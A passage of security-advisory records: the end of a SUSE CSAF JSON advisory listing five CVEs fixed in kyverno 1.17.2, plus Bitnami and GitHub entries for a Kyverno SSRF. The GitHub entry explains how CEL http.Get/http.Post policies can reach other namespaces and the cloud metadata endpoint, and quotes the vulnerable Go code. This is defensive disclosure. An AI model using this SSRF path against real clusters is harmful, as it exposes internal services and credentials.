          "product_id": "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64"
        },
        "product_reference": "kyverno-bash-completion-1.17.2-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-fish-completion-1.17.2-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64"
        },
        "product_reference": "kyverno-fish-completion-1.17.2-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-fish-completion-1.17.2-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le"
        },
        "product_reference": "kyverno-fish-completion-1.17.2-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-fish-completion-1.17.2-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x"
        },
        "product_reference": "kyverno-fish-completion-1.17.2-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-fish-completion-1.17.2-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64"
        },
        "product_reference": "kyverno-fish-completion-1.17.2-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-zsh-completion-1.17.2-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64"
        },
        "product_reference": "kyverno-zsh-completion-1.17.2-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-zsh-completion-1.17.2-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le"
        },
        "product_reference": "kyverno-zsh-completion-1.17.2-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-zsh-completion-1.17.2-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x"
        },
        "product_reference": "kyverno-zsh-completion-1.17.2-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kyverno-zsh-completion-1.17.2-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
        },
        "product_reference": "kyverno-zsh-completion-1.17.2-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-1229",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-1229"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "The CombinedMult function in the CIRCL ecc/p384 package (secp384r1 curve) produces an incorrect value for specific inputs. The issue is fixed by using complete addition formulas.\nECDH and ECDSA signing relying on this curve are not affected.\n\nThe bug was fixed in  v1.6.3 https://github.com/cloudflare/circl/releases/tag/v1.6.3 .",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-1229",
          "url": "https://www.suse.com/security/cve/CVE-2026-1229"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-25T00:00:00Z",
          "details": "critical"
        }
      ],
      "title": "CVE-2026-1229"
    },
    {
      "cve": "CVE-2026-24051",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-24051"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "OpenTelemetry-Go is the Go implementation of OpenTelemetry. The OpenTelemetry Go SDK in version v1.20.0-1.39.0 is vulnerable to Path Hijacking (Untrusted Search Paths) on macOS/Darwin systems. The resource detection code in sdk/resource/host_id.go executes the ioreg system command using a search path. An attacker with the ability to locally modify the PATH environment variable can achieve Arbitrary Code Execution (ACE) within the context of the application. A fix was released with v1.40.0.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-24051",
          "url": "https://www.suse.com/security/cve/CVE-2026-24051"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1259133 for CVE-2026-24051",
          "url": "https://bugzilla.suse.com/1259133"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-25T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-24051"
    },
    {
      "cve": "CVE-2026-33186",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-33186"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "gRPC-Go is the Go language implementation of gRPC. Versions prior to 1.79.3 have an authorization bypass resulting from improper input validation of the HTTP/2 `:path` pseudo-header. The gRPC-Go server was too lenient in its routing logic, accepting requests where the `:path` omitted the mandatory leading slash (e.g., `Service/Method` instead of `/Service/Method`). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official `grpc/authz` package) evaluated the raw, non-canonical path string. Consequently, \"deny\" rules defined using canonical paths (starting with `/`) failed to match the incoming request, allowing it to bypass the policy if a fallback \"allow\" rule was present. This affects gRPC-Go servers that use path-based authorization interceptors, such as the official RBAC implementation in `google.golang.org/grpc/authz` or custom interceptors relying on `info.FullMethod` or `grpc.Method(ctx)`; AND that have a security policy contains specific \"deny\" rules for canonical paths but allows other requests by default (a fallback \"allow\" rule). The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed `:path` headers directly to the gRPC server. The fix in version 1.79.3 ensures that any request with a `:path` that does not start with a leading slash is immediately rejected with a `codes.Unimplemented` error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string. While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods: Use a validating interceptor (recommended mitigation); infrastructure-level normalization; and/or policy hardening.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-33186",
          "url": "https://www.suse.com/security/cve/CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1260085 for CVE-2026-33186",
          "url": "https://bugzilla.suse.com/1260085"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-25T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-33186"
    },
    {
      "cve": "CVE-2026-34986",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-34986"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Go JOSE provides an implementation of the Javascript Object Signing and Encryption set of standards in Go, including support for JSON Web Encryption (JWE), JSON Web Signature (JWS), and JSON Web Token (JWT) standards. Prior to 4.1.4 and 3.0.5, decrypting a JSON Web Encryption (JWE) object will panic if the alg field indicates a key wrapping algorithm (one ending in KW, with the exception of A128GCMKW, A192GCMKW, and A256GCMKW) and the encrypted_key field is empty. The panic happens when cipher.KeyUnwrap() in key_wrap.go attempts to allocate a slice with a zero or negative length based on the length of the encrypted_key. This code path is reachable from ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() followed by Decrypt() on the resulting object. Note that the parse functions take a list of accepted key algorithms. If the accepted key algorithms do not include any key wrapping algorithms, parsing will fail and the application will be unaffected. This panic is also reachable by calling cipher.KeyUnwrap() directly with any ciphertext parameter less than 16 bytes long, but calling this function directly is less common. Panics can lead to denial of service. This vulnerability is fixed in 4.1.4 and 3.0.5.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-34986",
          "url": "https://www.suse.com/security/cve/CVE-2026-34986"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-25T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2026-34986"
    },
    {
      "cve": "CVE-2026-4789",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-4789"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
          "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-4789",
          "url": "https://www.suse.com/security/cve/CVE-2026-4789"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1261190 for CVE-2026-4789",
          "url": "https://bugzilla.suse.com/1261190"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
            "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-25T00:00:00Z",
          "details": "critical"
        }
      ],
      "title": "CVE-2026-4789"
    }
  ]
}

bit-kyverno-2026-4789

Vulnerability from bitnami_vulndb

Published

2026-04-06 07:49

Modified

2026-04-23 18:12

Summary

CVE-2026-4789

Details

Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Bitnami",
        "name": "kyverno",
        "purl": "pkg:bitnami/kyverno"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.16.0"
            },
            {
              "fixed": "1.17.2"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "severity": [
        {
          "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "type": "CVSS_V3"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-4789"
  ],
  "database_specific": {
    "cpes": [
      "cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*"
    ],
    "severity": "Critical"
  },
  "details": "Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.",
  "id": "BIT-kyverno-2026-4789",
  "modified": "2026-04-23T18:12:09.750Z",
  "published": "2026-04-06T07:49:20.364Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kyverno/kyverno"
    },
    {
      "type": "WEB",
      "url": "https://kb.cert.org/vuls/id/655822"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4789"
    },
    {
      "type": "WEB",
      "url": "https://portswigger.net/web-security/ssrf"
    },
    {
      "type": "WEB",
      "url": "https://www.kb.cert.org/vuls/id/655822"
    }
  ],
  "schema_version": "1.6.2",
  "summary": "CVE-2026-4789"
}

GHSA-RGGM-JJMC-3394

Vulnerability from github – Published: 2026-04-14 22:37 – Updated: 2026-04-14 22:37

Summary

Kyverno has SSRF via CEL http.Get/http.Post in NamespacedValidatingPolicy allows cross-namespace data access

Details

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Kyverno's CEL HTTP library (pkg/cel/libs/http/) allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests from the Kyverno admission controller. This enables unauthorized access to internal services in other namespaces, cloud metadata endpoints (169.254.169.254), and data exfiltration via policy error messages.

Affected Versions

Kyverno >= 1.16.0 (with policies.kyverno.io CRDs enabled, which is the default)
Tested on: Kyverno v1.16.2 (Helm chart 3.6.2)

Details

The http.Get() and http.Post() functions available in CEL-based policies (policies.kyverno.io API group) do not enforce any URL restrictions. Unlike resource.Lib which enforces namespace boundaries for namespaced policies, the http.Lib allows unrestricted access to any URL.

Vulnerable Code: pkg/cel/libs/http/http.go

func (r *contextImpl) Get(url string, headers map[string]string) (any, error) {
    req, err := http.NewRequestWithContext(context.TODO(), "GET", url, nil)
    // NO URL VALIDATION - no blocklist, no namespace restrictions
    ...
}

Contrast with resource.Lib which enforces namespace:

// pkg/cel/libs/resource/lib.go
func Lib(namespace string, v *version.Version) cel.EnvOption {
    return cel.Lib(&lib{namespace: namespace, version: v})  // Namespace enforced
}

